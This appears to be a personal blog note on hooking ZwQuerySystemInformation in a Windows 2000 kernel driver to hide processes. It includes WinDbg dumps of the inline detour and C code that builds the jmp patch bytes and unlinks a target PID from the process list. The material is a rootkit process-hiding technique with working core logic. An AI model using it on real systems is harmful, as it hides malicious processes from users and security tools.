First time writing a driver, first time using WinDbg + VMware, first time doing a Detour in ring0.
Incredibly, although debugging turned up plenty of errors, there was not a single BSOD.
Noting it down: hooked ZwQuerySystemInformation to do process hiding.
Test environment: Windows 2000 Server SP4
Before the hook:
kd> u nt!ZwQuerySystemInformation
nt!ZwQuerySystemInformation:
804011aa b897000000 mov eax,97h
804011af 8d542404 lea edx,[esp+4]
804011b3 cd2e int 2Eh
804011b5 c21000 ret 10h
804011b8 8bff mov edi,edi
After the hook:
kd> u hookproc!Jmp_ZwQuerySystemInformation
hookproc!Jmp_ZwQuerySystemInformation [e:\tmp\rk\hide_proc\hide_proc.c @ 141]:
f41504d0 b897000000 mov eax,97h
f41504d5 eaaf1140800800 jmp 0008:804011AF
f41504dc 90 nop
f41504dd 90 nop
f41504de cc int 3
f41504df cc int 3
f41504e0 cc int 3
f41504e1 cc int 3
kd> u nt!ZwQuerySystemInformation
nt!ZwQuerySystemInformation:
804011aa e941f3d473 jmp hookproc!Fake_ZwQuerySystemInformation (f41504f0)
804011af 8d542404 lea edx,[esp+4]
804011b3 cd2e int 2Eh
804011b5 c21000 ret 10h
804011b8 8bff mov edi,edi
nt!ZwQuerySystemTime:
804011ba b898000000 mov eax,98h
804011bf 8d542404 lea edx,[esp+4]
804011c3 cd2e int 2Eh
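The dump above shows the whole detour mechanism: the original first instruction `mov eax,97h` (b8 97 00 00 00, exactly 5 bytes) is overwritten with a 5-byte `jmp rel32` to Fake_ZwQuerySystemInformation, so the patch lands on a clean instruction boundary, and the trampoline Jmp_ZwQuerySystemInformation replays the stolen `mov eax,97h` before jumping back to 804011AF, the first untouched instruction. What the dump does not show is what Fake_ZwQuerySystemInformation does with the result. The C below is an added example and not the post's driver code: it computes the rel32 patch bytes and checks them against the dump, and it unlinks a PID from a SystemProcessInformation-style chain, where records are linked by NextEntryOffset. It is portable user-mode C with a minimal stand-in for SYSTEM_PROCESS_INFORMATION (only the two fields the unlink needs are modelled, an assumption); the hidden PID 1234 and the record sizes are constructed sample data. In the driver, the same unlink would run on the caller's buffer after the trampoline returns success for information class SystemProcessInformation (class 5).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ---- Part 1: the 5-byte inline patch -------------------------------------
 * nt!ZwQuerySystemInformation's first instruction, mov eax,97h (5 bytes), is
 * replaced by jmp rel32 (e9 xx xx xx xx, 5 bytes). rel32 is measured from the
 * end of the jmp, i.e. from src + 5. */
#define JMP_REL32_LEN 5

static void build_jmp_rel32(uint32_t src, uint32_t dst, uint8_t out[JMP_REL32_LEN])
{
    uint32_t rel = dst - (src + JMP_REL32_LEN);   /* 32-bit wraparound is intended */
    out[0] = 0xE9;
    out[1] = (uint8_t)rel;
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/* ---- Part 2: unlinking a process from the SystemProcessInformation chain ---
 * Minimal stand-in for SYSTEM_PROCESS_INFORMATION (assumption: only these two
 * fields are modelled). Real records carry many more fields plus a
 * variable-length thread array, which is why they are chained by
 * NextEntryOffset instead of a fixed stride. */
typedef struct {
    uint32_t NextEntryOffset;   /* bytes to the next record, 0 = last record */
    uint32_t UniqueProcessId;   /* HANDLE in the real struct, 32-bit on x86 */
} spi_hdr_t;

/* Unlinks every record whose PID matches; returns how many were unlinked.
 * A hidden record's bytes stay in the buffer, they just become unreachable
 * from the chain. The first record has no predecessor and is never unlinked
 * (in the real list it is the Idle process, PID 0). */
static unsigned hide_pid(uint8_t *buf, size_t len, uint32_t pid)
{
    unsigned removed = 0;
    spi_hdr_t *prev = NULL;
    size_t off = 0;

    for (;;) {
        if (off + sizeof(spi_hdr_t) > len)     /* truncated/malformed chain: stop */
            break;
        spi_hdr_t *cur = (spi_hdr_t *)(buf + off);
        if (prev != NULL && cur->UniqueProcessId == pid) {
            /* Skip cur: point prev past it, or end the chain if cur was last. */
            prev->NextEntryOffset = cur->NextEntryOffset
                                  ? prev->NextEntryOffset + cur->NextEntryOffset
                                  : 0;
            removed++;
        } else {
            prev = cur;
        }
        if (cur->NextEntryOffset == 0)
            break;
        off += cur->NextEntryOffset;
    }
    return removed;
}

/* Walks the chain the way a caller such as Task Manager would, collecting PIDs. */
static unsigned visible_pids(const uint8_t *buf, size_t len, uint32_t *out, unsigned max)
{
    unsigned n = 0;
    size_t off = 0;
    while (n < max && off + sizeof(spi_hdr_t) <= len) {
        const spi_hdr_t *cur = (const spi_hdr_t *)(buf + off);
        out[n++] = cur->UniqueProcessId;
        if (cur->NextEntryOffset == 0)
            break;
        off += cur->NextEntryOffset;
    }
    return n;
}

/* Appends one zero-filled record of `size` bytes to the constructed buffer. */
static size_t put_entry(uint8_t *buf, size_t off, uint32_t pid, uint32_t size, int last)
{
    spi_hdr_t *e = (spi_hdr_t *)(buf + off);
    memset(buf + off, 0, size);
    e->UniqueProcessId = pid;
    e->NextEntryOffset = last ? 0 : size;
    return off + size;
}

/* Constructed scenario: five records of different sizes, PID 1234 appearing in
 * the middle and as the last record. Returns 1 if hiding behaves as expected. */
int demo(void)
{
    static uint32_t storage[64];                 /* 4-byte aligned backing store */
    uint8_t *buf = (uint8_t *)storage;
    size_t len = 0;
    len = put_entry(buf, len,    0, 16, 0);      /* Idle */
    len = put_entry(buf, len,    8, 24, 0);      /* System */
    len = put_entry(buf, len, 1234, 40, 0);      /* target, middle of chain */
    len = put_entry(buf, len, 1600, 32, 0);
    len = put_entry(buf, len, 1234, 16, 1);      /* target again, last record */

    uint32_t pids[8];
    if (visible_pids(buf, len, pids, 8) != 5)
        return 0;
    unsigned removed = hide_pid(buf, len, 1234);
    unsigned n = visible_pids(buf, len, pids, 8);
    return removed == 2 && n == 3 && pids[0] == 0 && pids[1] == 8 && pids[2] == 1600;
}

int main(void)
{
    uint8_t patch[JMP_REL32_LEN];
    build_jmp_rel32(0x804011aaU, 0xf41504f0U, patch);   /* addresses from the dump */
    printf("patch bytes:");
    for (int i = 0; i < JMP_REL32_LEN; i++)
        printf(" %02x", patch[i]);
    printf("\nhide demo: %s\n", demo() ? "ok" : "FAILED");
    return demo() ? 0 : 1;
}
```

Two caveats a practitioner should keep in mind. The unlink leaves the hidden record's bytes in place and leaves the ReturnLength the original call reported unchanged, so a scanner that walks the buffer by size rather than by NextEntryOffset, or compares the two, can notice the gap. And in the driver the buffer being edited belongs to the caller and is usually user-mode memory, so the walk must be guarded against access faults rather than assumed to be valid as it is in this user-mode stand-in.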